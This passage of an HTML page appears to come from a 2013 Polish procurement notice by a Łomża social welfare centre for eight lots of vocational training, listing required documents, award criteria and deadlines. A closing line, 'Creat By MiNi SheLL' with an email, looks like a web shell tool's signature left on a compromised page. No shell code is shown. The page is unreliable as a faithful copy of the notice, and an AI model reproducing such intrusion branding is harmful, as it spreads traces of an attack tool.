<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pisemne zobowiązanie innych podmiotów lub inny dokument wykazujący i potwierdzający, że wykonawca będzie korzystać z zasobów tych podmiotów w okresie wykonania zamówienia stanowiącego przedmiot postępowania i że warunek w tym zakresie jest spełniony</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmniejszenia się liczby osób objętych szkoleniem, wysokość wynagrodzenia określonego zostanie obniżona proporcjonalnie do zmniejszenia się zakresu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopslomza.pl lub https://e-bip.org.pl/mopslomza/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego 18-400 Łomża ul. Dworna 23 B pokój 208.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 10:00, miejsce: w siedzibie zamawiającego 18-400 Łomża ul. Dworna 23 B pokój 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PKOL projekt systemowy EFS - Nowa droga do sukcesu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie Obsługa kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Obsługa kasy fiskalnej dla 21 osób  w wymiarze 70 godzin szkoleniowych (30 godzin teoria i 40 godzin praktyka)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi krawieckie dla 11 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi krawieckie dla 11 osób 150 godzin (48 teoria i 102 praktyka ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Malarz dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Malarz dla 10 osób  w wymiarze 100 godzin  ( 22 godz. teorii i  78 praktyki).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie Opiekun osób starszych dla 17 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Opiekun osób starszych dla 17 osób  w wymiarze 120 godzin szkoleniowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie z zakresu stylizacji paznokci dla  10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie z zakresu stylizacji paznokci dla  10 osób w wymiarze 32 godzin szkoleniowych  (z zakupem zestawu początkowego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs języka angielskiego 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs języka angielskiego 10 osób -  60 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prawo jazdy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawo jazdy kat  C, C +E  dla  4  osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> . Warsztaty wyjazdowe   integracyjne dla uczestników i ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Warsztaty wyjazdowe   integracyjne dla uczestników i ich rodzin  ( jeden dzień)- łącznie 100 osób) - przewiduje się 75 osób dorosłych i 25 dzieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com